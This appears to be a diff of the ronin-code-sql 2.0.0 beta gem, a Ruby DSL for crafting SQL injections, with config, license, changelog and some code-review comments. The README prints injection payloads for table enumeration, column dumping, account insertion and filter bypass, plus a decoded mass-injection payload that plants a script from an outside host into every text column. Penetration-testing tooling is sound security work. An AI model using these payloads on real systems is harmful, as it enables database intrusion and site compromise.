ronin-code-sql 2.0.0.beta1

Files changed (62) hide show
  1. checksums.yaml +7 -0
  2. data/.document +4 -0
  3. data/.editorconfig +11 -0
  4. data/.github/workflows/ruby.yml +27 -0
  5. data/.gitignore +11 -0
  6. data/.mailmap +1 -0
  7. data/.rspec +1 -0
  8. data/.ruby-version +1 -0
  9. data/.yardopts +1 -0
  10. data/COPYING.txt +165 -0
  11. data/ChangeLog.md +104 -0
  12. data/Gemfile +28 -0
  13. data/README.md +212 -0
  14. data/Rakefile +30 -0
  15. data/gemspec.yml +25 -0
  16. data/lib/ronin/code/sql/binary_expr.rb +53 -0
  17. data/lib/ronin/code/sql/clause.rb +74 -0
  18. data/lib/ronin/code/sql/clauses.rb +310 -0
  19. data/lib/ronin/code/sql/emittable.rb +88 -0
  20. data/lib/ronin/code/sql/emitter.rb +406 -0
  21. data/lib/ronin/code/sql/field.rb +110 -0
  22. data/lib/ronin/code/sql/fields.rb +82 -0
  23. data/lib/ronin/code/sql/function.rb +53 -0
  24. data/lib/ronin/code/sql/functions.rb +1265 -0
  25. data/lib/ronin/code/sql/injection.rb +168 -0
  26. data/lib/ronin/code/sql/injection_expr.rb +113 -0
  27. data/lib/ronin/code/sql/literal.rb +40 -0
  28. data/lib/ronin/code/sql/literals.rb +83 -0
  29. data/lib/ronin/code/sql/operators.rb +384 -0
  30. data/lib/ronin/code/sql/statement.rb +72 -0
  31. data/lib/ronin/code/sql/statement_list.rb +112 -0
  32. data/lib/ronin/code/sql/statements.rb +117 -0
  33. data/lib/ronin/code/sql/unary_expr.rb +38 -0
  34. data/lib/ronin/code/sql/version.rb +28 -0
  35. data/lib/ronin/code/sql.rb +96 -0
  36. data/ronin-code-sql.gemspec +62 -0
  37. data/spec/spec_helper.rb +3 -0
  38. data/spec/sql/binary_expr_examples.rb +25 -0
  39. data/spec/sql/binary_expr_spec.rb +5 -0
  40. data/spec/sql/clause_examples.rb +43 -0
  41. data/spec/sql/clause_spec.rb +31 -0
  42. data/spec/sql/clauses_spec.rb +47 -0
  43. data/spec/sql/emittable_spec.rb +41 -0
  44. data/spec/sql/emitter_spec.rb +533 -0
  45. data/spec/sql/field_spec.rb +103 -0
  46. data/spec/sql/fields_spec.rb +40 -0
  47. data/spec/sql/function_examples.rb +30 -0
  48. data/spec/sql/function_spec.rb +25 -0
  49. data/spec/sql/functions_spec.rb +113 -0
  50. data/spec/sql/injection_expr_spec.rb +98 -0
  51. data/spec/sql/injection_spec.rb +172 -0
  52. data/spec/sql/literal_spec.rb +5 -0
  53. data/spec/sql/literals_spec.rb +46 -0
  54. data/spec/sql/operators_spec.rb +44 -0
  55. data/spec/sql/statement_examples.rb +39 -0
  56. data/spec/sql/statement_list_spec.rb +48 -0
  57. data/spec/sql/statement_spec.rb +38 -0
  58. data/spec/sql/statements_spec.rb +22 -0
  59. data/spec/sql/unary_expr_examples.rb +20 -0
  60. data/spec/sql/unary_expr_spec.rb +5 -0
  61. data/spec/sql_spec.rb +18 -0
  62. metadata +157 -0
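--- /dev/null
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: fc5de90b2961287f9110ba16c922ad1b8e787563d7fb93a075834cb6935b2da9
+data.tar.gz: 61e12da2b15fa8306677b1f0bcaa1c1b973512bb5339e162af7eca6f15fdfb19
+SHA512:
+metadata.gz: 43387545e4de6ca18387df0ac5a8af970b0b99ce6fc0300094e61bc2898351dbeae176bd66ab0e097cf0028e164cf8c19c8841787839b71a8e964627b53be9c3
+data.tar.gz: 3b057ebcd0be473896562afb5d4159ab9930c1a0008f789f3c8473991b452eee485b0dfa8351b02401945b0b9c2777d21257e325ed5bd823ab1685a10e617109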
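--- /dev/null
+++ b/data/.document
@@ -0,0 +1,4 @@
+lib/**/*.rb
+-
+ChangeLog.md
+COPYING.txt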
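--- /dev/null
+++ b/data/.editorconfig
@@ -0,0 +1,11 @@
+root = true
+
+[*]
+end_of_line = lf
+insert_final_newline = true
+tab_width = 8
+trim_trailing_whitespace = true
+
+[{Gemfile,Rakefile,*.rb,*.gemspec,*.yml}]
+indent_style = space
+indent_size = 2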
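--- /dev/null
+++ b/data/.github/workflows/ruby.yml
@@ -0,0 +1,27 @@
+name: CI
+
+on: [ push, pull_request ]
+
+jobs:
+tests:
+runs-on: ubuntu-latest
+strategy:
+fail-fast: false
+matrix:
+ruby:
+- '3.0'
+- '3.1'
+- '3.2'
+- jruby
+- truffleruby
+name: Ruby ${{ matrix.ruby }}
+steps:
+- uses: actions/checkout@v2
+- name: Set up Ruby
+uses: ruby/setup-ruby@v1
+with:
+ruby-version: ${{ matrix.ruby }}
+- name: Install dependencies
+run: bundle install --jobs 4 --retry 3
+- name: Run tests
+run: bundle exec rake test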
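Review bot: The workflow declares no `permissions:` block and pins both actions to mutable major tags (`actions/checkout@v2` at step 19, `ruby/setup-ruby@v1` at step 21), so the job runs with the default GITHUB_TOKEN scope and a retagged or compromised action release would flow straight into CI. A top-level `permissions:` with `contents: read` is all this test job needs, and each `uses:` should be pinned to a full commit SHA with the tag kept in a trailing comment, e.g. `uses: actions/checkout@<commit-sha-placeholder> # v4`. `actions/checkout@v2` also targets a Node runtime that GitHub has since deprecated, so moving to a current major is worth doing when re-pinning. The rendered page has dropped this section's file header and the YAML indentation, so the nesting above has to be read from context.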
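--- /dev/null
+++ b/data/.gitignore
@@ -0,0 +1,11 @@
+doc
+pkg
+vendor/cache
+Gemfile.lock
+.bundle
+.DS_Store
+.yardoc
+*.db
+*.log
+*.swp
+*~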
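--- /dev/null
+++ b/data/.mailmap
@@ -0,0 +1 @@
+Postmodern <postmodern.mod3@gmail.com> postmodern <postmodern.mod3@gmail.com>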
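--- /dev/null
+++ b/data/.rspec
@@ -0,0 +1 @@
+--colour --format documentation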
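--- /dev/null
+++ b/data/.ruby-version
@@ -0,0 +1 @@
+ruby-3.1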
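--- /dev/null
+++ b/data/.yardopts
@@ -0,0 +1 @@
+--markup markdown --title 'Ronin SQL Documentation' --protected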
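--- /dev/null
+++ b/data/COPYING.txt
@@ -0,0 +1,165 @@
+GNU LESSER GENERAL PUBLIC LICENSE
+Version 3, 29 June 2007
+
+Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+Everyone is permitted to copy and distribute verbatim copies
+of this license document, but changing it is not allowed.
+
+
+This version of the GNU Lesser General Public License incorporates
+the terms and conditions of version 3 of the GNU General Public
+License, supplemented by the additional permissions listed below.
+
+0. Additional Definitions.
+
+As used herein, "this License" refers to version 3 of the GNU Lesser
+General Public License, and the "GNU GPL" refers to version 3 of the GNU
+General Public License.
+
+"The Library" refers to a covered work governed by this License,
+other than an Application or a Combined Work as defined below.
+
+An "Application" is any work that makes use of an interface provided
+by the Library, but which is not otherwise based on the Library.
+Defining a subclass of a class defined by the Library is deemed a mode
+of using an interface provided by the Library.
+
+A "Combined Work" is a work produced by combining or linking an
+Application with the Library. The particular version of the Library
+with which the Combined Work was made is also called the "Linked
+Version".
+
+The "Minimal Corresponding Source" for a Combined Work means the
+Corresponding Source for the Combined Work, excluding any source code
+for portions of the Combined Work that, considered in isolation, are
+based on the Application, and not on the Linked Version.
+
+The "Corresponding Application Code" for a Combined Work means the
+object code and/or source code for the Application, including any data
+and utility programs needed for reproducing the Combined Work from the
+Application, but excluding the System Libraries of the Combined Work.
+
+1. Exception to Section 3 of the GNU GPL.
+
+You may convey a covered work under sections 3 and 4 of this License
+without being bound by section 3 of the GNU GPL.
+
+2. Conveying Modified Versions.
+
+If you modify a copy of the Library, and, in your modifications, a
+facility refers to a function or data to be supplied by an Application
+that uses the facility (other than as an argument passed when the
+facility is invoked), then you may convey a copy of the modified
+version:
+
+a) under this License, provided that you make a good faith effort to
+ensure that, in the event an Application does not supply the
+function or data, the facility still operates, and performs
+whatever part of its purpose remains meaningful, or
+
+b) under the GNU GPL, with none of the additional permissions of
+this License applicable to that copy.
+
+3. Object Code Incorporating Material from Library Header Files.
+
+The object code form of an Application may incorporate material from
+a header file that is part of the Library. You may convey such object
+code under terms of your choice, provided that, if the incorporated
+material is not limited to numerical parameters, data structure
+layouts and accessors, or small macros, inline functions and templates
+(ten or fewer lines in length), you do both of the following:
+
+a) Give prominent notice with each copy of the object code that the
+Library is used in it and that the Library and its use are
+covered by this License.
+
+b) Accompany the object code with a copy of the GNU GPL and this license
+document.
+
+4. Combined Works.
+
+You may convey a Combined Work under terms of your choice that,
+taken together, effectively do not restrict modification of the
+portions of the Library contained in the Combined Work and reverse
+engineering for debugging such modifications, if you also do each of
+the following:
+
+a) Give prominent notice with each copy of the Combined Work that
+the Library is used in it and that the Library and its use are
+covered by this License.
+
+b) Accompany the Combined Work with a copy of the GNU GPL and this license
+document.
+
+c) For a Combined Work that displays copyright notices during
+execution, include the copyright notice for the Library among
+these notices, as well as a reference directing the user to the
+copies of the GNU GPL and this license document.
+
+d) Do one of the following:
+
+0) Convey the Minimal Corresponding Source under the terms of this
+License, and the Corresponding Application Code in a form
+suitable for, and under terms that permit, the user to
+recombine or relink the Application with a modified version of
+the Linked Version to produce a modified Combined Work, in the
+manner specified by section 6 of the GNU GPL for conveying
+Corresponding Source.
+
+1) Use a suitable shared library mechanism for linking with the
+Library. A suitable mechanism is one that (a) uses at run time
+a copy of the Library already present on the user's computer
+system, and (b) will operate properly with a modified version
+of the Library that is interface-compatible with the Linked
+Version.
+
+e) Provide Installation Information, but only if you would otherwise
+be required to provide such information under section 6 of the
+GNU GPL, and only to the extent that such information is
+necessary to install and execute a modified version of the
+Combined Work produced by recombining or relinking the
+Application with a modified version of the Linked Version. (If
+you use option 4d0, the Installation Information must accompany
+the Minimal Corresponding Source and Corresponding Application
+Code. If you use option 4d1, you must provide the Installation
+Information in the manner specified by section 6 of the GNU GPL
+for conveying Corresponding Source.)
+
+5. Combined Libraries.
+
+You may place library facilities that are a work based on the
+Library side by side in a single library together with other library
+facilities that are not Applications and are not covered by this
+License, and convey such a combined library under terms of your
+choice, if you do both of the following:
+
+a) Accompany the combined library with a copy of the same work based
+on the Library, uncombined with any other library facilities,
+conveyed under the terms of this License.
+
+b) Give prominent notice with the combined library that part of it
+is a work based on the Library, and explaining where to find the
+accompanying uncombined form of the same work.
+
+6. Revised Versions of the GNU Lesser General Public License.
+
+The Free Software Foundation may publish revised and/or new versions
+of the GNU Lesser General Public License from time to time. Such new
+versions will be similar in spirit to the present version, but may
+differ in detail to address new problems or concerns.
+
+Each version is given a distinguishing version number. If the
+Library as you received it specifies that a certain numbered version
+of the GNU Lesser General Public License "or any later version"
+applies to it, you have the option of following the terms and
+conditions either of that published version or of any later version
+published by the Free Software Foundation. If the Library as you
+received it does not specify a version number of the GNU Lesser
+General Public License, you may choose any version of the GNU Lesser
+General Public License ever published by the Free Software Foundation.
+
+If the Library as you received it specifies that a proxy can decide
+whether future versions of the GNU Lesser General Public License shall
+apply, that proxy's public statement of acceptance of any version is
+permanent authorization for you to choose that version for the
+Library.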
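--- /dev/null
+++ b/data/ChangeLog.md
@@ -0,0 +1,104 @@
+### 2.0.0 / 2023-XX-XX
+
+* Require `ruby` >= 3.0.0.
+* Added [ronin-support] ~> 0.1 as a dependency.
+* Renmaed `ronin/formatting/sql` to `ronin/support/encoding/sql` and moved it
+back into [ronin-support].
+
+[ronin-support]: https://github.com/ronin-rb/ronin-support#readme
+
+### 1.1.0 / 2013-01-22
+
+* Added `Ronin::SQL::InjectionExpr`, so that statements specified within
+`and { }`, `or { }` blocks would not be appending to the
+`Ronin::SQL::Injection` object.
+* Made `Ronin::SQL::Field` emittable.
+* Added `Ronin::SQL::Emitter#emit_argument`, so that any sub-statements will
+be wrapped in `( )`.
+* Improved `Ronin::SQL::Emitter#emit_field`.
+* Fixed `Ronin::SQL::Emitter#emit` to pass `Ronin::SQL::Function`s to
+`Ronin::SQL::Emitter#emit_function`.
+
+### 1.0.0 / 2013-01-21
+
+* Require [Ruby] >= 1.9.1.
+* No longer require ronin.
+* No longer require ronin-web.
+* Added `String#sql_unescape`.
+* Moved `String#sql_escape`, `String#sql_encode` and `String#sql_decode`
+from [ronin-support].
+* Refactored the `Ronin::SQL SQL` DSL to be more like
+[ARel](https://github.com/rails/arel#readme).
+* Moved the DSL from `Ronin::Code::SQL` into `Ronin::SQL`.
+* Removed `Ronin::SQL::Error`.
+* Removed `String#sql_error`.
+* Removed `String#sql_error?`.
+* Removed `URI::HTTP.has_sql_errors?`.
+* Removed `URI::HTTP.sql_error`.
+* Removed `URI::HTTP.sql_errors`.
+
+### 0.2.4 / 2009-09-24
+
+* Require ronin >= 0.3.0.
+* Require ronin-web >= 0.2.0.
+* Require rspec >= 1.1.12.
+* Require yard >= 0.2.3.5.
+* Updated the project summary and 3-point description for Ronin SQL.
+* Moved to YARD based documentation.
+* Fixed a formatting issue in the README.txt file, which was causing RDoc
+to crash.
+
+### 0.2.3 / 2009-07-02
+
+* Use Hoe >= 2.0.0.
+* Require ronin >= 0.2.4.
+* Require ronin-web >= 0.1.3.
+* Use Ronin::Scanners::Scanner to define the scanner for finding
+`Ronin::SQL::Injection` objects for URI::HTTP urls.
+* Added more specs.
+
+### 0.2.2 / 2009-01-22
+
+* Depend on the new ronin-web library.
+* Replace Hpricot with Nokogiri.
+* Use the new Ronin::Web::Spider, instead of directly using Spidr.
+* Use the new Nokogiri extensions from ronin-web.
+
+### 0.2.1 / 2009-01-09
+
+* Added missing files to the Manifest.
+
+### 0.2.0 / 2009-01-08
+
+* Require ronin >= 0.1.3.
+* Refactored `Ronin::Code::SQL`.
+* Implemented a token emitter system.
+* Support common SQL expression modifiers.
+* Support common SQL clauses.
+* Allow for injecting arbitrary SQL clauses.
+* Added more SQL Injection test generators.
+* all_rows: `OR 1 = 1`
+* exact_rows: `AND 1 = 1`
+* no_rows: `AND 1 = 0`
+* has_column?(column): `OR column IS NOT NULL`
+* has_table?(table): `AND (SELECT FROM table count(*) == 1)`
+* uses_column?(column): `GROUP BY column HAVING 1 = 1`
+* uses_table?(table): `OR table IS NOT NULL`
+* Removed references to `Ronin::Vulnerable`.
+* Added more specs:
+* Specs for most of `Ronin::Code::SQL`.
+* Specs on `Ronin::SQL::Error` and the SQL encoding/decoding extensions for
+the String class.
+
+### 0.1.1 / 2008-09-28
+
+* Trivial bug fix to `URI::HTTP#sql_errors`.
+
+### 0.1.0 / 2007-12-23
+
+* Initial release.
+* Supports SQL code generation.
+* Supports obfuscation of SQL code.
+* Supports SQL Injection code generation.
+
+[Ruby]: http://www.ruby-lang.org/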
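--- /dev/null
+++ b/data/Gemfile
@@ -0,0 +1,28 @@
+source 'https://rubygems.org'
+
+gemspec
+
+platform :jruby do
+gem 'jruby-openssl', '~> 0.7'
+end
+
+# Library dependencies
+# gem 'ronin-support', '~> 1.0', github: "ronin-rb/ronin-support",
+# branch: 'main'
+
+group :development do
+gem 'rake'
+gem 'rubygems-tasks', '~> 0.1'
+
+gem 'rspec', '~> 3.0'
+gem 'simplecov', '~> 0.20'
+
+gem 'kramdown', '~> 2.3'
+gem 'redcarpet', platform: :mri
+gem 'yard', '~> 0.9'
+gem 'yard-spellcheck', require: false
+
+gem 'dead_end', require: false
+gem 'sord', require: false, platform: :mri
+gem 'stackprof', require: false, platform: :mri
+end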
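--- /dev/null
+++ b/data/README.md
@@ -0,0 +1,212 @@
+# ronin-code-sql
+
+[![CI](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml/badge.svg)](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml)
+[![Code Climate](https://codeclimate.com/github/ronin-rb/ronin-code-sql.svg)](https://codeclimate.com/github/ronin-rb/ronin-code-sql)
+
+* [Source](https://github.com/ronin-rb/ronin-code-sql)
+* [Issues](https://github.com/ronin-rb/ronin-code-sql/issues)
+* [Documentation](https://ronin-rb.dev/docs/ronin-code-sql/frames)
+* [Discord](https://discord.gg/6WAb3PsVX9) |
+[Twitter](https://twitter.com/ronin_rb) |
+[Mastodon](https://infosec.exchange/@ronin_rb)
+
+## Description
+
+{Ronin::Code::SQL} is a Ruby DSL for crafting [SQL Injections (SQLi)][SQLi].
+
+### Features
+
+* Provides convenience methods for encoding/decoding SQL data.
+* Provides an Domain Specific Language (DSL) for crafting normal SQL and
+[SQL injections][SQLi].
+* Has 99% documentation coverage.
+* Has 98% test coverage.
+
+## Examples
+
+### Convenience Methods
+
+Escape a String:
+
+```ruby
+"O'Brian".sql_escape
+# => "'O''Brian'"
+```
+
+Unescapes a SQL String:
+
+```ruby
+"'O''Brian'".sql_unescape
+# => "O'Briand"
+```
+
+Hex encode a String:
+
+```ruby
+"exploit".sql_encode
+# => "0x6578706c6f6974"
+```
+
+Hex decode a String:
+
+```ruby
+string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
+string.sql_decode
+# => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
+```
+
+### SQLi DSL
+
+Injecting a `1=1` test into a Integer comparison:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.or { 1 == 1 }
+puts sqli
+# 1 OR 1=1
+```
+
+Injecting a `1=1` test into a String comparison:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.or { string(1) == string(1) }
+puts sqli
+# 1' OR '1'='1
+```
+
+Columns:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { admin == 1 }
+puts sqli
+# 1 AND admin=1
+```
+
+Clauses:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.or { 1 == 1 }.limit(0)
+puts sqli
+# 1 OR 1=1 LIMIT 0
+```
+
+Statements:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { 1 == 0 }
+sqli.insert.into(:users).values('hacker','passw0rd','t')
+puts sqli
+# 1 AND 1=0; INSERT INTO users VALUES ('hacker','passw0rd','t')
+```
+
+Sub-Statements:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union { select(1,2,3,4,id).from(users) }
+puts sqli
+# 1 UNION SELECT (1,2,3,4,id) FROM users
+```
+
+Test if a table exists:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { select(count).from(:users) == 1 }
+puts sqli
+# 1 AND (SELECT COUNT(*) FROM users)=1
+```
+
+Create errors by using non-existant tables:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.and { non_existant_table == '1' }
+puts sqli
+# 1' AND non_existant_table='1
+```
+
+Dumping all values of a column:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.or { username.is_not(null) }.or { username == '' }
+puts sqli
+# 1' OR username IS NOT NULL OR username='
+```
+
+Enumerate through database table names:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and {
+ascii(
+lower(
+substring(
+select(:name).top(1).from(sysobjects).where { xtype == 'U' }, 1, 1
+)
+)
+) > 116
+}
+puts sqli
+# 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype='U'),1,1)))>116
+```
+
+Find user supplied tables via the `sysObjects` table:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union_all {
+select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
+}
+puts sqli.to_sql(terminate: true)
+# 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--
+```
+
+Bypass filters using `/**/` instead of spaces:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union { select(1,2,3,4,id).from(users) }
+puts sqli.to_sql(space: '/**/')
+# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
+```
+
+## Requirements
+
+* [Ruby] >= 3.0.0
+* [ronin-support] ~> 1.0
+
+## Install
+
+```shell
+$ gem install ronin-code-sql
+```
+
+## License
+
+ronin-code-sql - A Ruby DSL for crafting SQL Injections.
+
+Copyright (c) 2007-2022 Hal Brodigan (postmodern.mod3 at gmail.com)
+
+ronin-code-sql is free software: you can redistribute it and/or modify
+it under the terms of the GNU Lesser General Public License as published
+by the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+ronin-code-sql is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public License
+along with ronin-code-sql. If not, see <https://www.gnu.org/licenses/>.
+
+[SQLi]: http://en.wikipedia.org/wiki/SQL_injection
+
+[Ruby]: http://www.ruby-lang.org
+[ronin-support]: https://github.com/ronin-rb/ronin-support#readme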
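--- /dev/null
+++ b/data/Rakefile
@@ -0,0 +1,30 @@
+require 'rubygems'
+
+begin
+require 'bundler'
+rescue LoadError => e
+warn e.message
+warn "Run `gem install bundler` to install Bundler."
+exit e.status_code
+end
+
+begin
+Bundler.setup(:development)
+rescue Bundler::BundlerError => e
+warn e.message
+warn "Run `bundle install` to install missing gems"
+exit e.status_code
+end
+
+require 'rake'
+
+require 'rubygems/tasks'
+Gem::Tasks.new(sign: {checksum: true, pgp: true})
+
+require 'rspec/core/rake_task'
+RSpec::Core::RakeTask.new
+task :test => :spec
+task :default => :spec
+
+require 'yard'
+YARD::Rake::YardocTask.new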
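Review bot: In the first `begin` block (lines 3–9 of the file), `rescue LoadError => e` is followed by `exit e.status_code`, but `LoadError` does not define `status_code` — only `Bundler::BundlerError`, which the second block rescues, does — so a machine without Bundler would die with a `NoMethodError` instead of the intended message and clean exit. Use a literal status in that branch, `exit 1`, and keep `exit e.status_code` only under the `Bundler::BundlerError` rescue. The release tasks are otherwise set up well: `Gem::Tasks.new(sign: {checksum: true, pgp: true})` keeps checksum and PGP signing on for built gems.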
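--- /dev/null
+++ b/data/gemspec.yml
@@ -0,0 +1,25 @@
+name: ronin-code-sql
+summary: A Ruby DSL for crafting SQL Injections.
+description:
+ronin-code-sql is a Ruby DSL for crafting SQL Injections.
+
+license: LGPL-3.0
+authors: Postmodern
+email: postmodern.mod3@gmail.com
+homepage: https://github.com/ronin-rb/ronin-code-sql#readme
+has_yard: true
+
+metadata:
+documentation_uri: https://rubydoc.info/gems/ronin-code-sql
+source_code_uri: https://github.com/ronin-rb/ronin-code-sql
+bug_tracker_uri: https://github.com/ronin-rb/ronin-code-sql/issues
+changelog_uri: https://github.com/ronin-rb/ronin-code-sql/blob/master/ChangeLog.md
+rubygems_mfa_required: 'true'
+
+required_ruby_version: ">= 3.0.0"
+
+dependencies:
+ronin-support: ~> 1.0.0.beta1
+
+development_dependencies:
+bundler: ~> 2.0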
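Review bot: The runtime requirement is declared here as `ronin-support: ~> 1.0.0.beta1` (line 22), but the ChangeLog.md added in this same release states `~> 0.1` and README.md states `~> 1.0`, so three documents disagree about the dependency and at least one will mislead users; treat the gemspec as authoritative and bring the other two into line. `description:` (line 3) is a plain scalar continued on the following line, which parses today but breaks silently if a later edit changes the indentation — a block scalar, `description: >-`, states the intent explicitly. `rubygems_mfa_required: 'true'` is correctly quoted, since RubyGems reads metadata values as strings, and `changelog_uri` points at `blob/master/ChangeLog.md`, which is worth confirming against the repository's actual default branch.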